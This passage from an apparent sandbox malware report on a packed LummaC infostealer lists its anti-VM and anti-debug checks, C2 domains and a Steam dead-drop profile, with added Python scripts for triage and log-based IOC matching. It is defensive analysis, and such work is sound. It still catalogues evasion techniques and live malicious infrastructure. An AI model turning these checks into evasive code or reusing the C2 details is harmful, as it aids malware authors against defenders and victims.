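        return sum(m in STACK_JUNK for m in body) / len(body) if body else 0.0

    def conditional_branches(self) -> int:
        return sum(bool(COND_JMP_RE.match(m)) for m in self.mnemonics)

    def payload(self) -> List[str]:
        """Instructions that are neither rdtsc, stack junk nor control flow."""
        return [i for i, m in zip(self.instructions, self.mnemonics)
                if m != "rdtsc" and m not in STACK_JUNK
                and not m.startswith("j") and m not in ("call", "ret")]


def parse_site(line: str) -> Optional[TimingSite]:
    m = LINE_RE.search(line)
    if not m:
        return None  # not an RDTSC interceptor entry
    first, second, body = m.groups()
    instrs = [t.strip() for t in OFFSET_RE.split(body) if t.strip()]
    if len(instrs) < 2 or instrs[0] != "rdtsc" or instrs[-1] != "rdtsc":
        raise ValueError(f"stub at {first} is not bounded by rdtsc")
    return TimingSite(int(first, 16), int(second, 16), instrs)


def build_chains(sites: List[TimingSite]) -> List[List[TimingSite]]:
    """Link entries whose 'second address' is another entry's 'first address'.
    A chain head is an entry whose first address is nobody's second address."""
    by_first: Dict[int, TimingSite] = {s.first: s for s in sites}
    seconds = {s.second for s in sites}
    chains = []
    for s in sites:
        if s.first in seconds:
            continue
        chain: List[TimingSite] = []
        cur: Optional[TimingSite] = s
        while cur is not None and cur not in chain:  # guard against a cycle
            chain.append(cur)
            cur = by_first.get(cur.second)
        chains.append(chain)
    return chains


def summarize(lines: List[str]) -> List[dict]:
    sites = [s for s in map(parse_site, lines) if s is not None]
    out = []
    for chain in build_chains(sites):
        out.append({
            "start": f"{chain[0].first:X}",
            "end": f"{chain[-1].second:X}",
            "reads": len(chain) + 1,  # entries share their boundary rdtsc
            "junk_ratio": round(sum(s.junk_ratio() for s in chain) / len(chain), 2),
            "cond_branches": sum(s.conditional_branches() for s in chain),
            "payload": [p for s in chain for p in s.payload()],
        })
    return out


if __name__ == "__main__":
    for chain in summarize(SAMPLE_LINES):
        print(chain)
```

A chain with a high junk ratio and no payload is protector mutation around a single timing probe; a chain whose payload dereferences memory, like the 4A50B4B one, is worth opening in a disassembler because the rdtsc reads there bracket real code. The conditional branches counted inside the stubs are not necessarily the delta comparison, so treat the count as a triage hint only.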
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 703A4A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 703AB7 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8A34C4 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8A37EB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8B8C23 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 92BD4B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\file.exe TID: 7600 | Thread sleep time: -120000s >= -30000s
    Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exe | Last function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.5.dr | Binary or memory string: VMware
    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
    Source: file.exe, 00000000.00000002.1565088782.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@<
    Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
    Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
    Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
    Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
    Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.5.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
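The anti-debugging lines above and the VM-detection lines earlier in this section (SystemBiosVersion, VideoBiosVersion, the DriverDesc of the display-adapter class {4d36e968-e325-11ce-bfc1-08002be10318}, SELECT * FROM Win32_BIOS) are the same family of checks: HideFromDebugger is NtSetInformationThread with ThreadHideFromDebugger, DebugPort is NtQueryInformationProcess with ProcessDebugPort, and NTICE/SICE/SIWVID are the device names of the long-discontinued SoftICE debugger. Together with the regmonclass/filemonclass/ollydbg window probes these are the stock checks of the WinLicense/Themida protector (consistent with the Oreans.vxd and Software\WinLicense strings in memory), so they identify the packer, not LummaC. Two caveats when reading this section: the VMware strings attributed to Amcache.hve.5.dr come from the Amcache hive of the analysis VM itself and describe the sandbox, not the sample; and a single hit in any one category is produced by plenty of legitimately protected software, so a verdict should require both the anti-VM and the anti-debug side. The script below is an added example, not part of the Joe Sandbox report or tooling: it classifies behaviour lines in the report's own format into those categories, normalising registry paths (ControlSet001 versus CurrentControlSet, HKEY_LOCAL_MACHINE versus HKLM) before matching, and derives a verdict from the category combination. The input lines are copied from the report except the final benign ProductName query, which is constructed to show what is not counted; the category names and the verdict rule are choices made for this example.

```python
import json
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed input: behaviour lines copied from the report above, plus one
# constructed benign registry query (last line) that must not be counted.
SAMPLE_BEHAVIOUR = [
    r"Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc",
    r"Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion",
    r"Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exe | File opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion name: ProductName",
]

ACTIONS = ("Registry key queried", "Key value queried", "WMI Queries", "Thread information set",
           "Open window title or class name", "File opened", "Process queried")
LINE_RE = re.compile(r"^Source:\s*(?P<src>\S+)\s*\|?\s*(?P<action>" + "|".join(map(re.escape, ACTIONS)) + r"):\s*(?P<arg>.*)$")

DISPLAY_CLASS_GUID = "{4D36E968-E325-11CE-BFC1-08002BE10318}"  # Windows "Display adapters" device class
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
ANALYSIS_WINDOWS = {"regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
                    "process monitor - sysinternals: www.sysinternals.com",
                    "registry monitor - sysinternals: www.sysinternals.com",
                    "file monitor - sysinternals: www.sysinternals.com"}


def normalize_key(key: str) -> str:
    """Upper-case, HKEY_LOCAL_MACHINE -> HKLM, and fold ControlSet001/CurrentControlSet together."""
    k = key.strip().upper().replace("HKEY_LOCAL_MACHINE", "HKLM")
    return re.sub(r"\\(CURRENTCONTROLSET|CONTROLSET\d{3})\\", r"\\CONTROLSET\\", k)


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Map one behaviour line to (technique, detail) or None when it is not an anti-analysis check."""
    m = LINE_RE.match(line)
    if not m:
        return None
    action, arg = m.group("action"), m.group("arg").strip()
    if action == "Registry key queried":
        key, _, value = arg.partition(" name: ")
        key = normalize_key(key)
        if key == r"HKLM\HARDWARE\DESCRIPTION\SYSTEM" and value in ("SystemBiosVersion", "VideoBiosVersion"):
            return ("anti-vm: firmware strings", value)
        if DISPLAY_CLASS_GUID in key and value == "DriverDesc":
            return ("anti-vm: display adapter name", value)
    elif action == "Key value queried":
        key, _, value = arg.rpartition(" ")
        if normalize_key(key) == r"HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY" and value == "MachineGuid":
            return ("host fingerprint: MachineGuid", value)
    elif action == "WMI Queries" and re.search(r"\bWin32_(BIOS|BaseBoard|ComputerSystem)\b", arg, re.I):
        return ("anti-vm: WMI hardware query", arg.split(":")[-1].strip())
    elif action == "Thread information set" and arg == "HideFromDebugger":
        return ("anti-debug: ThreadHideFromDebugger", arg)
    elif action == "Process queried" and arg == "DebugPort":
        return ("anti-debug: ProcessDebugPort", arg)
    elif action == "File opened" and arg.upper() in SOFTICE_DEVICES:
        return ("anti-debug: SoftICE device probe", arg)
    elif action == "Open window title or class name" and arg.lower() in ANALYSIS_WINDOWS:
        return ("analysis-tool discovery: window name", arg)
    return None


def triage(lines: List[str]) -> Dict[str, object]:
    hits: Counter = Counter()
    unmatched = 0
    for line in lines:
        c = classify(line)
        if c is None:
            unmatched += 1
        else:
            hits[c[0]] += 1
    families = sorted({t.split(":")[0] for t in hits})
    if "anti-vm" in families and "anti-debug" in families:
        verdict = "anti-vm + anti-debug: protector/packer-style evasion"
    elif families:
        verdict = "partial: " + ", ".join(families)
    else:
        verdict = "no anti-analysis behaviour"
    return {"hits": dict(hits), "families": families, "unmatched": unmatched, "verdict": verdict}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_BEHAVIOUR), indent=2))
```

The MachineGuid read is kept in its own "host fingerprint" family because it is not evasion: it is the stable per-host value a stealer typically reports as a victim identifier, and it is equally common in licensed commercial software.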

    HIPS / PFW / Operating System Protection Evasion

    Source: file.exe | String found in binary or memory: clearancek.site
    Source: file.exe | String found in binary or memory: licendfilteo.site
    Source: file.exe | String found in binary or memory: spirittunek.stor
    Source: file.exe | String found in binary or memory: bathdoomgaz.stor
    Source: file.exe | String found in binary or memory: studennotediw.stor
    Source: file.exe | String found in binary or memory: dissapoiznw.stor
    Source: file.exe | String found in binary or memory: eaglepawnoy.stor
    Source: file.exe | String found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: MJProgram Manager
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
    Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
    MITRE ATT&CK matrix (one tactic per column; a number in parentheses is the count of report signatures mapped to that technique, techniques without a number did not match):

    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (2) | Virtualization/Sandbox Evasion (24) | OS Credential Dumping | Security Software Discovery (641) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
    | Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (2) | LSASS Memory | Virtualization/Sandbox Evasion (24) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service |
    | Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (1) | NTDS | System Information Discovery (223) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction |
    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (12) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
    Antivirus, machine learning and reputation results for the submitted file:

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | file.exe | 53% | Virustotal | |
    | file.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
    | file.exe | 100% | Joe Sandbox ML | |

    Dropped files: No Antivirus matches
    Unpacked PE files: No Antivirus matches

    Domains:

    | Source | Detection | Scanner |
    |---|---|---|
    | steamcommunity.com | 0% | Virustotal |
    | sergei-esenin.com | 18% | Virustotal |
    | licendfilteo.site | 16% | Virustotal |
    | eaglepawnoy.store | 19% | Virustotal |
    | spirittunek.store | 22% | Virustotal |
    | studennotediw.store | 18% | Virustotal |
    | mobbipenju.store | 22% | Virustotal |
    | dissapoiznw.store | 22% | Virustotal |
    | bathdoomgaz.store | 22% | Virustotal |
    | clearancek.site | 18% | Virustotal |
    URLs (Joe Sandbox truncates long URLs, so several entries below end mid-path):

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe |
    | http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe |
    | https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe |
    | https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware |
    | https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe |
    | http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
    | https://steamcommunity.com:443/profiles/76561199724331900 | 100% | URL Reputation | malware |
    | https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe |
    | https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware |
    | https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe |
    | https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe |
    | https://store.steampowered.com/about/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe |
    | https://help.steampowered.com/en/ | 0% | URL Reputation | safe |
    | https://store.steampowered.com/news/ | 0% | URL Reputation | safe |
    | http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe |
    | https://store.steampowered.com/stats/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe |
    | https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe |
    | https://store.steampowered.com/legal/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | URL Reputation | safe |
    | http://upx.sf.net | 0% | URL Reputation | safe |
    | https://store.steampowered.com/ | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english | 0% | URL Reputation | safe |
    | http://store.steampowered.com/account/cookiepreferences/ | 0% | URL Reputation | safe |
    | https://store.steampowered.com/mobile | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english | 0% | URL Reputation | safe |
    | https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl | 0% | URL Reputation | safe |
    | https://steamcommunity.com/profiles/76561199724331900/badges | 100% | URL Reputation | malware |
    | https://www.cloudflare.com/learning/access-management/phishing-attack/ | 0% | Virustotal | |
    | https://sergei-esenin.com/ | 0% | Virustotal | |
    | https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | 0% | Virustotal | |
    | https://steamcommunity.com/?subsection=broadcasts | 0% | Virustotal | |
    | https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | 0% | Virustotal | |
    | dissapoiznw.store | 22% | Virustotal | |
    | https://eaglepawnoy.store:443/api | 22% | Virustotal | |
    | studennotediw.store | 18% | Virustotal | |
    | https://www.cloudflare.com/5xx-error-landing | 0% | Virustotal | |
    | https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | 0% | Virustotal | |
    | https://sergei-esenin.com/apit | 3% | Virustotal | |
    | https://sergei-esenin.com:443/api% | 9% | Virustotal | |
    | https://steamcommunity.com/market/ | 0% | Virustotal | |
    | https://sergei-esenin.com/apiX | 4% | Virustotal | |
    | eaglepawnoy.store | 19% | Virustotal | |
    | bathdoomgaz.store | 22% | Virustotal | |
    | https://sergei-esenin.com:443/api | 19% | Virustotal | |
    | https://steamcommunity.com/my/wishlist/ | 0% | Virustotal | |
    | https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Virustotal | |
    | https://community.akamai.steamstatic.co | 0% | Virustotal | |
    | https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | 0% | Virustotal | |
    | https://sergei-esenin.com/apiJ | 9% | Virustotal | |
    | clearancek.site | 18% | Virustotal | |
    | https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e | 0% | Virustotal | |
    | https://community.akamai.steamstatic.com/public/shared/css/shared_resp | 0% | Virustotal | |
    | spirittunek.store | 22% | Virustotal | |
    | https://steamcommunity.com/discussions/ | 0% | Virustotal | |
    | https://steamcommunity.com/workshop/ | 0% | Virustotal | |
    | licendfilteo.site | 16% | Virustotal | |
    | https://studennotediw.store:443/api | 22% | Virustotal | |
    Contacted domains:

    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|---|---|
    | steamcommunity.com | 104.102.49.254 | true | true | | unknown |
    | sergei-esenin.com | 172.67.206.204 | true | true | | unknown |
    | eaglepawnoy.store | unknown | unknown | true | | unknown |
    | bathdoomgaz.store | unknown | unknown | true | | unknown |
    | spirittunek.store | unknown | unknown | true | | unknown |
    | licendfilteo.site | unknown | unknown | true | | unknown |
    | studennotediw.store | unknown | unknown | true | | unknown |
    | mobbipenju.store | unknown | unknown | true | | unknown |
    | clearancek.site | unknown | unknown | true | | unknown |
    | dissapoiznw.store | unknown | unknown | true | | unknown |
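The eight ".stor" strings in the evasion section above are cut off in the report; the contacted-domains table here carries the full names, and those are the ones to block. Two details matter when turning this report into network detections. First, the LummaC C2 URLs have the form https://<domain>:443/api, while the plain domain entries are the DNS side of the same traffic. Second, steamcommunity.com resolved during the run and is marked malicious in the table, yet only the specific profile URL (https://steamcommunity.com/profiles/76561199724331900, 100% "malware" in the URL table) is hostile: LummaC fetches its live C2 from a Steam profile page, so the profile must be matched by host and path while the host alone stays unblocked for real Steam users. The script below is an added example, not part of the Joe Sandbox report or tooling: it builds the indicator set from the tables above, matches DNS and HTTP log lines with dot-anchored suffix matching (so notclearancek.site does not match clearancek.site), treats the Steam profile as a path-scoped dead drop, and flags a source host only when the combination of events is consistent with an infection. The log format and the log lines are constructed for this example; the domains and the profile URL are copied from the report.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Contacted C2 domains, copied from the contacted-domains table of the report above.
LUMMA_C2_DOMAINS = frozenset({
    "sergei-esenin.com", "eaglepawnoy.store", "bathdoomgaz.store", "spirittunek.store",
    "licendfilteo.site", "studennotediw.store", "mobbipenju.store", "clearancek.site",
    "dissapoiznw.store",
})
# Steam profile the sample fetched (flagged "malware" in the URL table above). Matched by
# host+path so that steamcommunity.com itself is never blocked.
DEAD_DROP_URLS = frozenset({"https://steamcommunity.com/profiles/76561199724331900"})
C2_PATH = "/api"  # the report lists <c2>:443/api URLs

# Constructed log lines: "<ts> dns <src> <qtype> <qname>" or "<ts> http <src> <method> <url>".
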